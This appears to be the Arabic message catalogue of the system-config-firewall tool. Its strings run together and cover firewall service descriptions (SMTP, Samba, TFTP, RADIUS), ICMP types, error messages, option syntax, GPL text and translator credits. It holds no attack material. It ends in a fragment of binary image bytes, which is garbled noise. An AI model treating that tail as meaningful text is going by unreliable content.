بعيد عبر اتصال TCP/IP. فعّل هذا الخيار إذا كنت تفكّر بإتاحة خدمة POP3 (عن طريق dovecot مثلاً).خدمة استيثاق المستخدم بالطلب عن بعد (RADIUS) ميفاقٌ لاستيثاق المستخدمين على الشبكة. فعّل هذا الخيار إذا كنت تخطّط لإتاحة خدمة RADIUS (عن طريق freeradiusمثلاً)يستخدم ميفاق نقل الملفات العاديّ (TFTP) لنقل الملفات من من جهاز بعيد بطريقة سهلة، ولإقلاع محطّات العمل عديمة الأقراص، ولنقل البيانات في بيئات التنفيذ قبل الإقلاع (PXE).المَلف '%s' غير موجود.إعدادات الجدار النّاريّ غير مُتَسِقة.الجدار الناري مُعَطل.الجدار النّاري مُفَعّل.جدول الجدار النّاريّ '%s' غير صالح.الملفات أدنأه مفقودة أو غير صالحة للاستعمال: 
	%s

الرجاء تطبيق إعدادات الجدار النّاري  الآن لتصحيح هذه المشكلة.نوع الميفاق '%s' غير صالح.هنالك تَغيرات غير مُطَبَقة ,هل حقاً تريد المُغادرة؟رسالة الخطأ هذه لإعلام  المُضيف بإرسال الحُزم لطريق آخَر.رسالة الخطأ هذه يوَلدها المُضيف أو السبيل الافتراضي  إذا كانت الوجهة غير قابلة للوصول.رسالة الخطأ هذه تُولد إذا كانت ترويسة العنوان عبر الشبكة سيئة ,بسبب خيار مفقود أو  طول سيّء للترويسة .رسالة الخطأ هذه تُولد إذا تم تجاوز الوقت اللازم للبقاء متصلاً إما لحزمة أو لإعادة تشكيل حزمة مجزئةتم توليد رسالة الخطأ هذه لإعلام المضيف بخفض وتيرته في إرسال الحزم .هذه الرسالة  إجابة على <i>طلب الصَدي</i> .هذه الرسالة يستخدمها مضيف مُرفق بوصلة إعلان متعدد، لطلب <i>اعلان موجـِّه</i>.هذه الرسالة تستخدمها المُوَجِهات للإعلان بشكل دوري عن رقم العنوان على الشبكة من واجهة الإرسال المتعددة.هذه الرسالة تستخدم لإختبار اذا ما كان المُضيف قابل للوصول بوساطة اداة <i>الصَدى</i>.يتيح هذا الخيار لخادوم باكُلا الاتّصال بالحاسب المحلّي لجدولة عمليات النّسخ الاحتياطي. يلزمك تثبيت الحزمة bacula-client ليكون هذا الخيار فاعلًا.يسمح هذا الخيار بتوصيل بريد SMTP. فعّل هذا الخيار إذا كنت تحتاج للسماح لمضيفين بعيدين بالاتصال مباشرة بجهازك لتوصيل البريد. لا تحتاج لتفعيل هذا الخيار إذا كنت تستقبل بريدك على خادم آخر، ومن ثم تستلمه عبر POP3 أو SMTP، أو تستخدم أدوات كـfetchmail. انتبه إلى أن خادم SMTP غير مضبوط بشكل جيّد قد يتيح لأجهزة أخرى أن تستخدم جهازك لإرسال رسائل البريد المزعج spam.يسمح لك هذا الخيار بالوصول إلى خوادم ميفاق نقل الملفّات العاديّ (TFTP). تحتاج إلى حزمة tftp مثبّتة للاستفادة من هذا الخيار.يسمح لك هذا الخيار بالوصول لشبكات ويندوز لمشاركة الملفات والطباعة. تحتاج لحزمة samba-client مثبّتة لتستفيد من هذا الخير.يسمح هذا الخيار بالوصول والمشاركة في شبكات ويندوز لمشاركة الملفات والطّباعة. تحتاج إلى حزمة samba مثبّتة ليكون هذا الخيار ذا فائدة.يتيح لك هذا الخيار استخدام طقم Red Hat للشبكات العنقوديّة، وذلك بفتح المنافذ لـopenais و ricci و dlm. تحتاج طقم Red Hat للشبكات العنقوديّة مثبّتاً ليكون هذا الخيار ذا فائدة.هذا برنامجُ حُر ; يمكنك إعادة توزيعه و/او تعديله تحت شروط الرخصة العمومية العامة التي نشرتها مؤسسة البرمجيات الحرة ;سواء الإصدارة الثانية أو  أي إصدارة  لاحقة (حسب رغبتك). 
 
يوزع هذا البرنامج على أمل أن يكون مفيداً لمن يستخدمه دون أدنى مسؤولية ; ولا حتى أي ضمان يضمن صلاحية العرض في السوق أو توافقه مع أي استخدام محدد.يمكنك مراجعة الرخصة العمومية العامة لـجنو لمزيد من التفاصيل.

من المفترض أن تكون قد استلمت نسخة من رخصة جنو العامة مع هذا البرنامج.في حال عدم استلامك لها, انظر  <http://www.gnu.org/licenses/>.هذا البرنامج سيساعدك على إنشاء الإعدادات  الاساسية للجدار النّاريّ لنظامك.هذا المساعد سيساعدك على إنشاء إعدادات نظيفة للجدار النّاريّ لنظامك.تجاوز الوقتإلى العنوانإلى المَنفذلِضَمان حالة معقولة، يجب أن تفرغ وحدات الجدار النّاريّ للنواة عندما يتم إعادة تشغيل أو إيقاف الجدار النّأريّ.الواجهات الموثوقة:الخدمات المَوثوقةنَوعتَفريغ الوحدات عند إعادة التشغيل والإيقافحدّث الجدار الناري لا تفاعليّا إذا كان مفعّلاً. هذا سيعيد تشغيل الجدار الناري أيضاً. الخيارات -n و -f سيتم تجاهلها.استخدم ملفات قواعد مخصّصة لإضافة قواعد إضافيّة للجدار الناريّ. تضاف القواعد الإضافيّة بعد المبدئيّة. يجب أن تكون الملفات بتنسيق iptables-save.يعرفه المستخدممستوى مهارة المستخدماستخدام هذه الخيارات دون خيارات الجدار الناري الأخرى لن ينشئ أو يغير إعدادات الجدار الناري. فقط ستضبط الأمن المحسّن للينكس.قيمة صالحة: %sالقيم المتاحة: <منفذ>[-<منفذ>]، حيث المنفذ هو اسم خدمة أو رقم يتراوح بين صِفر و 65535.القيم الصالحة هي: tcp, udpمُسهب الحالةإدارة الآلة الافتراضيةإدارة الآلة الافتراضية (TLS)الشبكة العنكبوتيّة العالميّة (HTTP)إنذارما هو نوع النظام لديك؟معالجنعميمكنك تغيير الاعدادات من قائمة <i>الخيارات</i> بعد ذلك.إعدادات الجدار النّاريّ لديك تم تحويلها من نسخة قديمة. الرجاء التحقق من الإعدادات ثم تطبيقها.[<type>:][<table>:]<filename>_عَنْ_ملف_مساعدة_خيارات_مغادرة_بدأ معالج الإعداداتإعداداتif=<interface>:port=<port>:proto=<protocol>[:toport=<destination port>][:toaddr=<destination address>]الواجهة '%s' غير صالحة. تعريف مَنفذ غير صالح %s.خَدمة غير صالحة '%s'.ipv6 لا يدعم nat.مَحَليّيتيح mDNS إمكانيّة استخدام واجهة برمجة DNS، و أنماط الحزم، و مفاهيم التشغيل في شبكة صغيرة دون خادم DNS معروف. إذا كنت تخطط لاستخدام Avahi، لا تعطّل هذا الخيار.تغيير التسمية%s  لا يوجد خيار كهذا:خيار %(option)s: مَنفذ التحويل '%(value)s' غير صالح.خيار %(option)s: منفذ التحويل '%(value)s' غير صالح : %(error)s.خيار%(option)s: نوع رسائل مراقبة الشبكة '%(value)s' غير صالح.مدى المَنافذ %s مُستخدم مسبقاً.system-config-firewallOssama M. Khayat <okhayat@yahoo.com>, 2004.
Maha Helwa <mahahelwa@gmx.net>, 2004
Sherif Abdelgawad <sherif@redhat.com>, 2004.
Muhammed Al-Fakhori <mhmd.alfakhori@gmail.com>,  2010.
Abdalrahim Fakhouri<abdilra7eem@yahoo.com>, 2010.
مصعب الزعبي Mosaab Alzoubi <moceap@hotmail.com>,2013إعدادات الجدار النّاريعلّم أنواع ICMP التي سترفض في القائمة. كلّ أنواع ICMP الأخرى سيسمح لها بالمرور عبر الجدار الناريّ. المبدئيّ هو عدم وجود قيود.يستخدم بروتوكول رسائل التّحكم بالشّابكة (ICMP) بشكل رئيسي في إرسال رسائل الخطأ بين الحواسيب ضمن الشّبكة، كما يشمل إرسال رسائل المعلومات كطلبات ping  وردودها كوظيفة إضافيّة.استخدم ملفات قواعد مخصّصة لإضافة قواعد إضافيّة للجدار الناريّ. تضاف القواعد الإضافيّة بعد المبدئيّة. يجب أن تكون الملفات بتنسيق iptables-save.
y~or5J={Eeu磝QkᯘG{?+]ן?wM3X^歌>{7پK>on\jyR g/=fOroNVv~Y+NGuÝHWyw[eQʨSb>>}Gmx[o[<{Ϯ_qF vMIENDB`